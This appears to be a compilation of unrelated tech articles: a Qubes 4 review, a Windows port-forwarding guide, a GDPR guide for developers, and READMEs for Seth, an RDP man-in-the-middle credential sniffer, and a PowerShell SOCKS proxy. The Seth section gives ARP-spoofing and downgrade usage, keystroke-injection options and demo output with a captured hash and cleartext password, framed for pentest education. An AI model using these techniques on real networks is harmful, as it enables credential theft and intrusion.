Anyone who's been involved in the Linux community is familiar with a refactor. There's a long history of open-source project refactoring that usually happens around a major release. GNOME and KDE in particular both use .0 releases to rethink those desktop environments completely. Although that refactoring can cause complaints in the community, anyone who has worked on a large software project will tell you that sometimes you have to go in, keep what works, remove the dead code, make it more maintainable and rethink how your users use the software now and how they will use it in the future.

I've been using Qubes as my primary desktop for more than two years, and I've written about it previously in my Linux Journal column, so I was pretty excited to hear that Qubes was doing a refactor of its own in the new 4.0 release. As with most refactors, this one caused some past features to disappear throughout the release candidates, but starting with 4.0-rc4, the release started to stabilize with a return of most of the features Qubes 3.2 users were used to. That's not to say everything is the same. In fact, a lot has changed both on the surface and under the hood. Although Qubes goes over all of the significant changes in its Qubes 4 changelog, instead of rehashing every low-level change, I want to highlight just some of the surface changes in Qubes 4 and how they might impact you whether you've used Qubes in the past or are just now trying it out.

Installer

For the most part, the Qubes 4 installer looks and acts like the Qubes 3.2 installer with one big difference: Qubes 4 uses many different CPU virtualization features out of the box for better security, so it's now much more picky about CPUs that don't have those features enabled, and it will tell you so. At the beginning of the install process after you select your language, you will get a warning about any virtualization features you don't have enabled. In particular, the installer will warn you if you don't have IOMMU (also known as VT-d on Intel processors—a way to present virtualized memory to devices that need DMA within VMs) and SLAT (hardware-enforced memory virtualization). If you skip the warnings and finish the install anyway, you will find you have problems starting up VMs. In the case of IOMMU, you can work around this problem by changing the virtualization mode for the sys-net and sys-usb VMs (the only ones by default that have PCI devices assigned to them) from being HVM (Hardware VM) to PV (ParaVirtualized) from the Qubes dom0 terminal:

$ qvm-prefs sys-net virt_mode pv
$ qvm-prefs sys-usb virt_mode pv

This will remove the reliance on IOMMU support, but it also means you lose the protection IOMMU gives you—malicious DMA-enabled devices you plug in might be able to access RAM outside the VM! (I discuss the differences between HVM and PV VMs in the next section.)

VM Changes

It's no surprise that the default templates are all updated in Qubes 4—software updates are always expected in a new distribution release. Qubes 4 now ships with Fedora 26 and Debian 9 templates out of the box.
The dom0 VM that manages the desktop also has a much newer 4.14.13 kernel and Xen 4.8, so you are more likely to have better hardware support overall (this newer Xen release fixes some suspend issues on newer hardware, like the Purism Librem 13v2, for instance). Another big difference in Qubes 4 is the default VM type it uses. Qubes relies on Xen for its virtualization platform and provides three main virtualization modes for VMs:

PV (ParaVirtualized): this is the traditional Xen VM type that requires a Xen-enabled kernel to work. Because of the hooks into the OS, it is very efficient; however, this also means you can't run an OS that doesn't have Xen enabled (such as Windows or Linux distributions without a Xen kernel).

HVM (Hardware VM): this VM type uses full hardware virtualization features in the CPU, so you don't need special Xen support. This means you can run Windows VMs or any other OS whether or not it has a Xen kernel, and it also provides much stronger security because you have hardware-level isolation of each VM from other VMs.

PVH (PV Hybrid mode): this is a special PV mode that takes advantage of hardware virtualization features while still using a paravirtualized kernel.

In the past, Qubes would use PV for all VMs by default, but starting with Qubes 4, almost all of the VMs will default to PVH mode. Although initially the plan was to default all VMs to HVM mode, now the default for most VMs is PVH mode to help protect VMs from Meltdown, with HVM mode being reserved for VMs that have PCI devices (like sys-net and sys-usb).

GUI VM Manager

Another major change in Qubes 4 relates to the GUI VM manager. In past releases, this program provided a graphical way for you to start, stop and pause VMs. It also allowed you to change all your VM settings, firewall rules and even which applications appeared in the VM's menu. It also provided a GUI way to back up and restore VMs. With Qubes 4, a lot has changed. The ultimate goal with Qubes 4 is to replace the VM manager with standalone tools that replicate most of the original functionality. One of the first parts of the VM manager to be replaced is the ability to manage devices (the microphone and USB devices including storage devices). In the past, you would insert a USB thumb drive and then right-click on a VM in the VM manager to attach it to that VM, but now there is an ever-present icon in the desktop panel (Figure 1) you can click that lets you assign the microphone and any USB devices to VMs directly. Beside that icon is another Qubes icon you can click that lets you shut down VMs and access their preferences.

Figure 1. Device Management from the Panel

For quite a few release candidates, those were the only functions you could perform through the GUI. Everything else required you to fall back to the command line. Starting with the Qubes 4.0-rc4 release though, a new GUI tool called the Qube Manager has appeared that attempts to replicate most of the functionality of the previous tool including backup and restore (Figure 2). The main features the new tool is missing are those features that were moved out into the panel. It seems like the ultimate goal is to move all of the features out into standalone tools, and this GUI tool is more of a stopgap to deal with the users who had relied on it in the past.

Figure 2. New Qube Manager

Backup and Restore

The final obvious surface change you will find in Qubes 4 is in backup and restore.
With the creation of the Qube Manager, you can now back up your VMs from the GUI again, just like with Qubes 3.2. The general backup process is the same as in the past, but starting with Qubes 4, all backups are encrypted instead of having that be optional. Restoring backups also largely behaves like in past releases. One change, however, is when restoring Qubes 3.2 VMs. Some previous release candidates couldn't restore 3.2 VMs at all. Although you now can restore Qubes 3.2 VMs in Qubes 4, there are a few changes. First, old dom0 backups won't show up to restore, so you'll need to move over those files manually. Second, old template VMs don't contain some of the new tools Qubes 4 templates have, so although you can restore them, they may not integrate well with Qubes 4 without some work. This means when you restore VMs that depend on old templates, you will want to change them to point to the new Qubes 4 templates. At that point, they should start up as usual.

Conclusion

As I mentioned at the beginning of this article, these are only some of the more obvious surface changes in Qubes 4. Like with most refactors, even more has changed behind the scenes as well. If you are curious about some of the underlying technology changes, check out the Qubes 4 release notes and follow the links related to specific features.

______________________

Kyle Rankin is Chief Security Officer at Purism, a company focused on computers that respect your privacy, security, and freedom. He is the author of many books including Linux Hardening in Hostile Networks, DevOps Troubleshooting and The Official Ubuntu

Source: http://www.linuxjournal.com/content/whats-new-qubes-4
Posted on February 21, 2018 · Posted in Windows 10, Windows 7

Port Forwarding in Windows

In Microsoft Windows, starting from Windows XP, there is a built-in ability to set up network port forwarding. Thanks to it, any incoming TCP connection (IPv4 or IPv6) to a local port can be redirected to another local port or even to a port on a remote computer, and it is not necessary for the system to have a service listening on that port. In Linux, port redirection is configured quite simply using iptables. On Windows Server systems, the Routing and Remote Access Service (RRAS) is used to organize port forwarding. However, there is an easier way to configure port forwarding, which works equally well in any version of Windows.

Port forwarding in Windows can be configured using the Portproxy mode of the Netsh command. The syntax of this command is as follows:

netsh interface portproxy add v4tov4 listenaddress=localaddress listenport=localport connectaddress=destaddress connectport=destport

where
listenaddress – the local IP address waiting for a connection
listenport – the local listening TCP port (the connection is waited on it)
connectaddress – the local or remote IP address (or DNS name) to which the incoming connection will be redirected
connectport – the TCP port to which the connection from listenport is forwarded

Suppose that our task is to make the RDP service respond on a non-standard port, for example 3340 (the port can be changed in the settings of the service, but we will use RDP to make it easier to demonstrate forwarding). To do this, you need to redirect incoming traffic on TCP port 3340 to another local port – 3389 (the standard RDP port). Start the command prompt as an administrator and run the following command:

netsh interface portproxy add v4tov4 listenport=3340 listenaddress=10.1.1.110 connectport=3389 connectaddress=10.1.1.110

where 10.1.1.110 is the current IP address of this computer.

Using netstat, make sure that port 3340 is now being listened on:

netstat -ano | findstr :3340

Note. If this command does not return anything and port forwarding via the netsh interface portproxy does not work, make sure that you have the iphlpsvc (IP Helper) service running on your system. And on the network interface for which the port forwarding rule is created, IPv6 support must be enabled. These are the prerequisites for correct port forwarding. Without the IP Helper service and without IPv6 support enabled, the port redirection does not work.

You can find out which process is listening on this port using its PID (in our example, the PID is 636):

tasklist | findstr 636

Let's try to connect to this computer from a remote system using any RDP client. Port 3340 should be specified as the RDP port. It is specified after the colon following the RDP server address, for example, 10.1.1.110:3340.

The connection should be established successfully.

Important. Make sure that your firewall (Windows Firewall or a third-party one that is often included in antivirus software) allows incoming connections to the new port. If necessary, you can add a new Windows Firewall rule using this command:

netsh advfirewall firewall add rule name="forwarded_RDPport_3340" protocol=TCP dir=in localip=10.1.1.110 localport=3340 action=allow

When creating an incoming firewall rule for port 3340 via the Windows Firewall graphical interface, no program needs to be associated with it. This port is only listened on by the network driver.

You can create any number of Windows port forwarding rules.
All netsh interface portproxy rules are persistent and are stored in the system after a Windows restart.

Display the list of forwarding rules in the system:

netsh interface portproxy show all

In our case there is only one forwarding rule, from port 3340 to 3389:

Listen on ipv4:             Connect to ipv4:
Address         Port        Address         Port
--------------- ----------  --------------- ----------
10.1.1.110      3340        10.1.1.110      3389

Tip. Portproxy settings can also be obtained as follows:

netsh interface portproxy dump

#========================
# Port Proxy configuration
#========================
pushd interface portproxy
reset
add v4tov4 listenport=3340 connectaddress=10.1.1.110 connectport=3389
popd
# End of Port Proxy configuration

To remove a specific port forwarding rule:

netsh interface portproxy delete v4tov4 listenport=3340 listenaddress=10.1.1.110

To clear all current port forwarding rules:

netsh interface portproxy reset

Important. This forwarding scheme works only for TCP ports. You won't be able to forward UDP ports this way. Also you can't use 127.0.0.1 as connectaddress.

If you want to forward an incoming TCP connection to another computer, the command can look like this:

netsh interface portproxy add v4tov4 listenport=3389 listenaddress=0.0.0.0 connectport=3389 connectaddress=192.168.100.101

This rule will redirect all incoming RDP requests (to port 3389) from this computer to a remote computer with the IP address 192.168.100.101.

Another portproxy feature is the opportunity to make it look like any remote network service is operating locally. For example, forward the connection from local port 5555 to the remote address 157.166.226.25 (CNN website):

netsh interface portproxy add v4tov4 listenport=5555 connectport=80 connectaddress=157.166.226.25 protocol=tcp

Now if you go to http://localhost:5555/ in your browser, the CNN start page will open. So although the browser addresses the local computer, it opens a remote page.

Port forwarding can also be used to forward a port from an external address of a network card to a virtual machine port running on the same computer. Also, there were cases when in Windows Server 2012 R2 the port forwarding rules worked only until the system was rebooted, and after restart they were reset. In this case, you need to check whether there are periodic disconnections on the network interface, and whether the IP address changes when the OS boots (it is better to use a static IP). As a workaround, I had to add a script to the Windows scheduler with the netsh interface portproxy rules that runs on system startup.

In Windows Server 2003 / XP, you must additionally set the IPEnableRouter parameter to 1 in the registry key HKLM\SYSTEM\ControlSet001\Services\Tcpip\Parameters.

Source: http://woshub.com/port-forwarding-in-windows/
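A minimal sketch of that scheduler workaround, reusing the rule from the example above (the script path is hypothetical):

:: C:\Scripts\portproxy.cmd -- re-create the portproxy rules at startup
@echo off
netsh interface portproxy reset
netsh interface portproxy add v4tov4 listenport=3340 listenaddress=10.1.1.110 connectport=3389 connectaddress=10.1.1.110

Register it to run at boot with the Task Scheduler:

schtasks /create /tn "RestorePortProxy" /tr "C:\Scripts\portproxy.cmd" /sc onstart /ru SYSTEM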
Black Hat
Published on Mar 2, 2018

Your datacenter isn't a bunch of computers, it is *a* computer. While some large organizations have over a decade of experience running software-defined datacenters at massive scale, many more large organizations are just now laying the foundations for their own cloud-scale platforms based on similar ideas.

By Dino Dai Zovi
Seth

Seth is a tool written in Python and Bash to MitM RDP connections by attempting to downgrade the connection in order to extract clear text credentials. It was developed to raise awareness and educate about the importance of properly configured RDP connections in the context of pentests, workshops or talks. The author is Adrian Vollmer (SySS GmbH).

Usage

Run it like this:

$ ./seth.sh <INTERFACE> <ATTACKER IP> <VICTIM IP> <GATEWAY IP|HOST IP> [<COMMAND>]

Unless the RDP host is on the same subnet as the victim machine, the last IP address must be that of the gateway. The last parameter is optional. It can contain a command that is executed on the RDP host by simulating WIN+R via key press event injection. Keystroke injection depends on which keyboard layout the victim is using - currently it's only reliable with the English US layout. I suggest avoiding special characters by using powershell -enc <STRING>, where STRING is your UTF-16le and Base64 encoded command. However, calc should be pretty universal and gets the job done.

The shell script performs ARP spoofing to gain a Man-in-the-Middle position and redirects the traffic such that it runs through an RDP proxy. The proxy can be called separately. This can be useful if you want to use Seth in combination with Responder. Use Responder to gain a Man-in-the-Middle position and run Seth at the same time. Run seth.py -h for more information:

usage: seth.py [-h] [-d] [-f] [-p LISTEN_PORT] [-b BIND_IP] [-g {0,1,3,11}]
               [-j INJECT] -c CERTFILE -k KEYFILE
               target_host [target_port]

RDP credential sniffer -- Adrian Vollmer, SySS GmbH 2017

positional arguments:
  target_host           target host of the RDP service
  target_port           TCP port of the target RDP service (default 3389)

optional arguments:
  -h, --help            show this help message and exit
  -d, --debug           show debug information
  -f, --fake-server     perform a 'fake server' attack
  -p LISTEN_PORT, --listen-port LISTEN_PORT
                        TCP port to listen on (default 3389)
  -b BIND_IP, --bind-ip BIND_IP
                        IP address to bind the fake service to (default all)
  -g {0,1,3,11}, --downgrade {0,1,3,11}
                        downgrade the authentication protocol to this (default 3)
  -j INJECT, --inject INJECT
                        command to execute via key press event injection
  -c CERTFILE, --certfile CERTFILE
                        path to the certificate file
  -k KEYFILE, --keyfile KEYFILE
                        path to the key file

For more information read the PDF in doc/paper (or read the code!). The paper also contains recommendations for counter measures.

You can also watch a twenty minute presentation including a demo (starting at 14:00) on Youtube: https://www.youtube.com/watch?v=wdPkY7gykf4

Demo

The following output shows the attacker's view. Seth sniffs an offline crackable hash as well as the clear text password. Here, NLA is not enforced and the victim ignored the certificate warning.

# ./seth.sh eth1 192.168.57.{103,2,102}

███████╗███████╗████████╗██╗  ██╗
██╔════╝██╔════╝╚══██╔══╝██║  ██║   by Adrian Vollmer
███████╗█████╗     ██║   ███████║   seth@vollmer.syss.de
╚════██║██╔══╝     ██║   ██╔══██║   SySS GmbH, 2017
███████║███████╗   ██║   ██║  ██║   https://www.syss.de
╚══════╝╚══════╝   ╚═╝   ╚═╝  ╚═╝

[*] Spoofing arp replies...
[*] Turning on IP forwarding...
[*] Set iptables rules for SYN packets...
[*] Waiting for a SYN packet to the original destination...
[+] Got it! Original destination is 192.168.57.102
[*] Clone the x509 certificate of the original destination...
[*] Adjust the iptables rule for all packets...
[*] Run RDP proxy...
Listening for new connection
Connection received from 192.168.57.103:50431
Downgrading authentication options from 11 to 3
Enable SSL
alice::avollmer-syss:1f20645749b0dfd5:b0d3d5f1642c05764ca28450f89d38db:0101000000000000b2720f48f5ded2012692fcdbf5c79a690000000002001e004400450053004b0054004f0050002d0056004e0056004d0035004f004e0001001e004400450053004b0054004f0050002d0056004e0056004d0035004f004e0004001e004400450053004b0054004f0050002d0056004e0056004d0035004f004e0003001e004400450053004b0054004f0050002d0056004e0056004d0035004f004e0007000800b2720f48f5ded20106000400020000000800300030000000000000000100000000200000413a2721a0d955c51a52d647289621706d6980bf83a5474c10d3ac02acb0105c0a0010000000000000000000000000000000000009002c005400450052004d005300520056002f003100390032002e003100360038002e00350037002e00310030003200000000000000000000000000
Tamper with NTLM response
TLS alert access denied, Downgrading CredSSP
Connection lost
Connection received from 192.168.57.103:50409
Listening for new connection
Enable SSL
Connection lost
Connection received from 192.168.57.103:50410
Listening for new connection
Enable SSL
Hiding forged protocol request from client
.\alice:ilovebob
Keyboard Layout: 0x409 (English_United_States)
Key press: LShift
Key press: S
Key release: S
Key release: LShift
Key press: E
Key release: E
Key press: C
Key release: C
Key press: R
Key release: R
Key press: E
Key release: E
Key press: T
Key release: T
Connection lost
[*] Cleaning up...
[*] Done.

Requirements

python3
tcpdump
arpspoof (arpspoof is part of dsniff)
openssl

Disclaimer

Use at your own risk. Do not use without full consent of everyone involved. For educational purposes only.

Source: https://github.com/SySS-Research/Seth
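For reference, when running the proxy separately (e.g. alongside Responder, as mentioned above), an invocation using only the documented flags might look like this; the target address and certificate paths are hypothetical:

$ python3 seth.py -g 3 -c cert.pem -k key.pem 192.168.57.102 3389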
GDPR – A Practical Guide For Developers

Bozho November 29, 2017

You've probably heard about GDPR, the new European data protection regulation that applies practically to everyone. Especially if you are working in a big company, it's most likely that there's already a process for getting your systems in compliance with the regulation.

The regulation is basically a law that must be followed in all European countries (but also applies to non-EU companies that have users in the EU). In this particular case, it applies to companies that are not registered in Europe, but have European customers. So that's most companies. I will not go into yet another "12 facts about GDPR" or "7 myths about GDPR" post/whitepaper, as they are often aimed at managers or legal people. Instead, I'll focus on what GDPR means for developers.

Why am I qualified to do that? A few reasons – I was advisor to the deputy prime minister of an EU country, and because of that I've been both exposed to legislation and have written some myself. I'm familiar with the "legalese" and how the regulatory framework operates in general. I'm also a privacy advocate and I've been writing about GDPR-related stuff in the past, i.e. "before it was cool" (protecting sensitive data, the right to be forgotten). And finally, I'm currently working on a project that (among other things) aims to help with covering some GDPR aspects.

I'll try to be a bit more comprehensive this time and cover as many aspects of the regulation that concern developers as I can. And while developers will mostly be concerned about how the systems they are working on have to change, it's not unlikely that a less informed manager storms in in late spring, realizing GDPR is going to be in force tomorrow, asking "what should we do to get our system/website compliant".

The rights of the user/client (referred to as "data subject" in the regulation) that I think are relevant for developers are:
the right to erasure (the right to be forgotten/deleted from the system),
the right to restriction of processing (you still keep the data, but mark it as "restricted" and don't touch it without further consent by the user),
the right to data portability (the ability to export one's data in a machine-readable format),
the right to rectification (the ability to get personal data fixed),
the right to be informed (getting human-readable information, rather than long terms and conditions),
the right of access (the user should be able to see all the data you have about them).

Additionally, the relevant basic principles are: data minimization (one should not collect more data than necessary), and integrity and confidentiality (all security measures to protect data that you can think of, plus measures to guarantee that the data has not been inappropriately modified).

Even further, the regulation requires certain processes to be in place within an organization (of more than 250 employees or if a significant amount of data is processed), and those include keeping a record of all types of processing activities carried out, including transfers to processors (3rd parties), which includes cloud service providers. None of the other requirements of the regulation have an exception depending on the organization size, so "I'm small, GDPR does not concern me" is a myth.

It is important to know what "personal data" is. Basically, it's every piece of data that can be used to uniquely identify a person or data that is about an already identified person.
It's data that the user has explicitly provided, but also data that you have collected about them from either 3rd parties or based on their activities on the site (what they've been looking at, what they've purchased, etc.).

Having said that, I'll list a number of features that will have to be implemented and some hints on how to do that, followed by some do's and don't's.

"Forget me" – you should have a method that takes a userId and deletes all personal data about that user (in case the data has been collected on the basis of consent or based on the legitimate interests of the controller (see more below), and not due to contract enforcement or legal obligation). It is actually useful for integration tests to have that feature (to clean up after the test), but it may be hard to implement depending on the data model. In a regular data model, deleting a record may be easy, but some foreign keys may be violated. That means you have two options – either make sure you allow nullable foreign keys (for example an order usually has a reference to the user that made it, but when the user requests his data be deleted, you can set the userId to null), or make sure you delete all related data (e.g. via cascades). This may not be desirable, e.g. if the order is used to track available quantities or for accounting purposes. It's a bit trickier for event-sourcing data models, or in extreme cases, ones that include some sort of blockchain/hash chain/tamper-evident data structure. With event sourcing you should be able to remove a past event and re-generate intermediate snapshots. For blockchain-like structures – be careful what you put in there and avoid putting personal data of users. There is an option to use a chameleon hash function, but that's suboptimal. Overall, you must constantly think of how you can delete the personal data. And "our data model doesn't allow it" isn't an excuse. What about backups? Ideally, you should keep a separate table of forgotten user IDs, so that each time you restore a backup, you re-forget the forgotten users. This means the table should be in a separate database or have a separate backup/restore process. (A minimal SQL sketch of this flow appears below.)

Notify 3rd parties for erasure – deleting things from your system may be one thing, but you are also obligated to inform all third parties that you have pushed that data to. So if you have sent personal data to, say, Salesforce, Hubspot, twitter, or any cloud service provider, you should call an API of theirs that allows for the deletion of personal data. If you are such a provider, obviously, your "forget me" endpoint should be exposed. Calling the 3rd party APIs to remove data is not the full story, though. You also have to make sure the information does not appear in search results. Now, that's tricky, as Google doesn't have an API for removal, only a manual process. Fortunately, it's only about public profile pages that are crawlable by Google (and other search engines, okay…), but you still have to take measures. Ideally, you should make the personal data page return a 404 HTTP status, so that it can be removed.

Restrict processing – in your admin panel where there's a list of users, there should be a button "restrict processing". The user settings page should also have that button. When clicked (after reading the appropriate information), it should mark the profile as restricted. That means it should no longer be visible to the backoffice staff, or publicly. You can implement that with a simple "restricted" flag in the users table and a few if-clauses here and there.
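A minimal sketch of the "forget me" flow in SQL, assuming a hypothetical schema with a users table, an orders table with a nullable user_id foreign key, and a separately backed-up forgotten_users table:

-- Detach orders from the user but keep them for accounting (nullable FK)
UPDATE orders SET user_id = NULL WHERE user_id = :user_id;

-- Delete the personal data itself
DELETE FROM users WHERE id = :user_id;

-- Remember the ID so that restored backups can be re-forgotten
INSERT INTO forgotten_users (user_id, forgotten_at)
VALUES (:user_id, CURRENT_TIMESTAMP);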
Export data – there should be another button – "export data". When clicked, the user should receive all the data that you hold about them. What exactly is that data depends on the particular use case. Usually it's at least the data that you delete with the "forget me" functionality, but it may include additional data (e.g. the orders the user has made may not be deleted, but should be included in the dump). The structure of the dump is not strictly defined, but my recommendation would be to reuse schema.org definitions as much as possible, for either JSON or XML. If the data is simple enough, a CSV/XLS export would also be fine. Sometimes data export can take a long time, so the button can trigger a background process, which would then notify the user via email when his data is ready (twitter, for example, does that already – you can request all your tweets and you get them after a while). You don't need to implement an automated export, although it would be nice. It's sufficient to have a process in place to allow users to request their data, which can be a manual database-querying process.

Allow users to edit their profile – this seems an obvious rule, but it isn't always followed. Users must be able to fix all data about them, including data that you have collected from other sources (e.g. using a "login with facebook" you may have fetched their name and address). Rule of thumb – all the fields in your "users" table should be editable via the UI. Technically, rectification can be done via a manual support process, but that's normally more expensive for a business than just having the form to do it. There is one other scenario, however, when you've obtained the data from other sources (i.e. the user hasn't provided their details to you directly). In that case there should still be a page where they can identify somehow (via email and/or sms confirmation) and get access to the data about them.

Consent checkboxes – "I accept the terms and conditions" would no longer be sufficient to claim that the user has given their consent for processing their data. So, for each particular processing activity there should be a separate checkbox on the registration (or user profile) screen. You should keep these consent checkboxes in separate columns in the database, and let the users withdraw their consent (by unchecking these checkboxes from their profile page – see the previous point). Ideally, these checkboxes should come directly from the register of processing activities (if you keep one). Note that the checkboxes should not be preselected, as this does not count as "consent". Another important thing here is machine learning/AI. If you are going to use the user's data to train your ML models, you should get consent for that as well (unless it's for scientific purposes, which have special treatment in the regulation). Note here the so-called "legitimate interest". It is for the legal team to decide what a legitimate interest is, but direct marketing is included in that category, as well as any common sense processing relating to the business activity – e.g. if you collect addresses for shipping, it's obviously a legitimate interest. So not all processing activities need consent checkboxes.

Re-request consent – if the consent users have given was not clear (e.g. if they simply agreed to terms & conditions), you'd have to re-obtain that consent.
So prepare a functionality for mass-emailing your users to ask them to go to their profile page and check all the checkboxes for the personal data processing activities that you have.

"See all my data" – this is very similar to the "Export" button, except the data should be displayed in the regular UI of the application rather than in an XML/JSON format. I wouldn't say this is mandatory, and you can leave it as a "desirable" feature – for example, Google Maps shows you your location history – all the places that you've been to. It is a good implementation of the right of access. (Though Google is very far from perfect where privacy is concerned.) This is not all about the right of access – you have to let unregistered users ask whether you have data about them, but that would be a more manual process. The ideal minimum would be to have a feature "check by email", where you check if you have data about a particular email. You also need to tell the user in what ways you are processing their data. You can simply print all the records in your data processing register to which the user has consented.

Age checks – you should ask for the user's age, and if the user is a child (below 16), you should ask for parent permission. There's no clear way how to do that, but my suggestion is to introduce a flow where the child should specify the email of a parent, who can then confirm. Obviously, children will just cheat with their birthdate, or provide a fake parent email, but you will most likely have done your job according to the regulation (this is one of the "wishful thinking" aspects of the regulation).

Keeping data for no longer than necessary – if you've collected the data for a specific purpose (e.g. shipping a product), you have to delete it/anonymize it as soon as you don't need it. Many e-commerce sites offer "purchase without registration", in which case the consent goes only for the particular order. So you need a scheduled job/cron to periodically go through the data and anonymize it (delete names and addresses), but only after a certain condition is met – e.g. the product is confirmed as delivered. You can have a database field for storing the deadline after which the data should be gone, and that deadline can be extended in case of a delivery problem.

Now some "do's", which are mostly about the technical measures needed to protect personal data (outlined in article 32). They may be more "ops" than "dev", but often the application also has to be extended to support them. I've listed most of what I could think of in a previous post. An important note here is that this is not mandated by the regulation, but it's a good practice anyway and helps with protecting personal data.

Encrypt the data in transit. That means that communication between your application layer and your database (or your message queue, or whatever component you have) should be over TLS. The certificates could be self-signed (and possibly pinned), or you could have an internal CA. Different databases have different configurations, just google "X encrypted connections". Some databases need gossiping among the nodes – that should also be configured to use encryption.

Encrypt the data at rest – this again depends on the database (some offer table-level encryption), but it can also be done on the machine level, e.g. using LUKS. The private key can be stored in your infrastructure, or in some cloud service like AWS KMS.
Encrypt your backups – kind of obvious.

Implement pseudonymisation – the most obvious use case is when you want to use production data for the test/staging servers. You should change the personal data to some "pseudonym", so that the people cannot be identified. When you push data for machine learning purposes (to third parties or not), you can also do that. Technically, that could mean that your User object can have a "pseudonymize" method which applies hash+salt/bcrypt/PBKDF2 to some of the data that can be used to identify a person (a minimal sketch of such a method appears after this list). Pseudonyms could be reversible or not, depending on the use case (the definition in the regulation implies reversibility based on secret information, but in the case of test/staging data it might not be). Some databases have such features built in, e.g. Oracle.

Protect data integrity – this is a very broad thing, and could simply mean "have authentication mechanisms for modifying data". But you can do something more, even as simple as a checksum, or a more complicated solution (like the one I'm working on). It depends on the stakes, on the way data is accessed, on the particular system, etc. The checksum can be in the form of a hash of all the data in a given database record, which should be updated each time the record is updated through the application. It isn't a strong guarantee, but it is at least something.

Have your GDPR register of processing activities in something other than Excel – Article 30 says that you should keep a record of all the types of activities that you use personal data for. That sounds like bureaucracy, but it may be useful – you will be able to link certain aspects of your application with that register (e.g. the consent checkboxes, or your audit trail records). It wouldn't take much time to implement a simple register, but the business requirements for that should come from whoever is responsible for the GDPR compliance. But you can advise them that having it in Excel won't make it easy for you as a developer (imagine having to fetch the excel file internally, so that you can parse it and implement a feature). Such a register could be a microservice/small application deployed separately in your infrastructure.

Log access to personal data – every read operation on a personal data record should be logged, so that you know who accessed what and for what purpose. This does not follow directly from the provisions of the regulation, but it is kinda implied by the accountability principles. What about search results (or lists) that contain personal data about multiple subjects? My hunch is that simply logging "user X did a search for criteria Y" would suffice. But don't display too much personal data in lists – for example see how facebook makes you go through some hoops to get a person's birthday.

Note: some have treated article 30 as a requirement to keep an audit log. I don't think it is saying that – instead it requires 250+ companies (or companies processing data regularly) to keep a register of the types of processing activities (i.e. what you use the data for). There are other articles in the regulation that imply that keeping an audit log is a best practice (for protecting the integrity of the data as well as to make sure it hasn't been processed without a valid reason).

Register all API consumers – you shouldn't allow anonymous API access to personal data. I'd say you should request the organization name and contact person for each API user upon registration, and add those to the data processing register.
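A minimal sketch of such a "pseudonymize" helper in Python, assuming a hypothetical secret key kept outside the database (in your infrastructure or a KMS):

import hashlib
import hmac
import os

# Hypothetical: the key lives in an environment variable / KMS, not in the DB
PSEUDONYM_KEY = os.environ["PSEUDONYM_KEY"].encode()

def pseudonymize(value: str) -> str:
    # Keyed hash: stable output (so joins and tests still work),
    # irreversible without the key
    return hmac.new(PSEUDONYM_KEY, value.encode(), hashlib.sha256).hexdigest()

# e.g. before copying production data to staging:
# user.email = pseudonymize(user.email)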
Finally, some "don't's".

Don't use data for purposes that the user hasn't agreed with – that's supposed to be the spirit of the regulation. If you want to expose a new API to a new type of clients, or you want to use the data for some machine learning, or you decide to add ads to your site based on users' behaviour, or sell your database to a 3rd party – think twice. I would imagine your register of processing activities could have a button to send notification emails to users to ask them for permission when a new processing activity is added (or if you use a 3rd party register, it should probably give you an API). So upon adding a new processing activity (and adding that to your register), mass email all users from whom you'd like consent. Note here that additional legitimate interests of the controller might be added dynamically.

Don't log personal data – getting rid of the personal data from log files (especially if they are shipped to a 3rd party service) can be tedious or even impossible. So log just identifiers if needed. And make sure old log files are cleaned up, just in case.

Don't put fields on the registration/profile form that you don't need – it's always tempting to just throw in as many fields as the usability person/designer agrees on, but unless you absolutely need the data for delivering your service, you shouldn't collect it. Names you should probably always collect, but unless you are delivering something, a home address or phone is unnecessary.

Don't assume 3rd parties are compliant – you are responsible if there's a data breach in one of the 3rd parties (e.g. "processors") to which you send personal data. So before you send data via an API to another service, make sure they have at least a basic level of data protection. If they don't, raise a flag with management.

Don't assume having ISO XXX makes you compliant – information security standards and even personal data standards are a good start and they will probably cover 70% of what the regulation requires, but they are not sufficient – most of the things listed above are not covered in any of those standards.

Overall, the purpose of the regulation is to make you take conscious decisions when processing personal data. It imposes best practices in a legal way. If you follow the above advice and design your data model, storage, data flow, API calls with data protection in mind, then you shouldn't worry about the huge fines that the regulation prescribes – they are for extreme cases, like Equifax for example. Regulators (data protection authorities) will most likely have some checklists into which you'd have to somehow fit, but if you follow best practices, that shouldn't be an issue.

I think all of the above features can be implemented in a few weeks by a small team. Be suspicious when a big vendor offers you a generic plug-and-play "GDPR compliance" solution. GDPR is not just about the technical aspects listed above – it does have organizational/process implications. But also be suspicious if a consultant claims GDPR is complicated. It's not – it relies on a few basic principles that are in fact best practices anyway. Just don't ignore them.

Source: https://techblog.bozho.net/gdpr-practical-guide-developers/
Invoke-SocksProxy

Creates a Socks proxy using powershell. Supports both Socks4 and Socks5 connections.

Examples

Create a Socks 4/5 proxy on port 1234:

Import-Module .\Invoke-SocksProxy.psm1
Invoke-SocksProxy -bindPort 1234

Create a simple tcp port forward:

Import-Module .\Invoke-SocksProxy.psm1
Invoke-PortFwd -bindPort 33389 -destHost 127.0.0.1 -destPort 3389

Limitations

This is only a subset of the Socks 4 and 5 protocols:
It does not support authentication.
It does not support UDP or bind requests.
Used connections are not always dismissed, causing a memory leak.

New features will be implemented in the future. PRs are welcome.

Source: https://github.com/p3nt4/Invoke-SocksProxy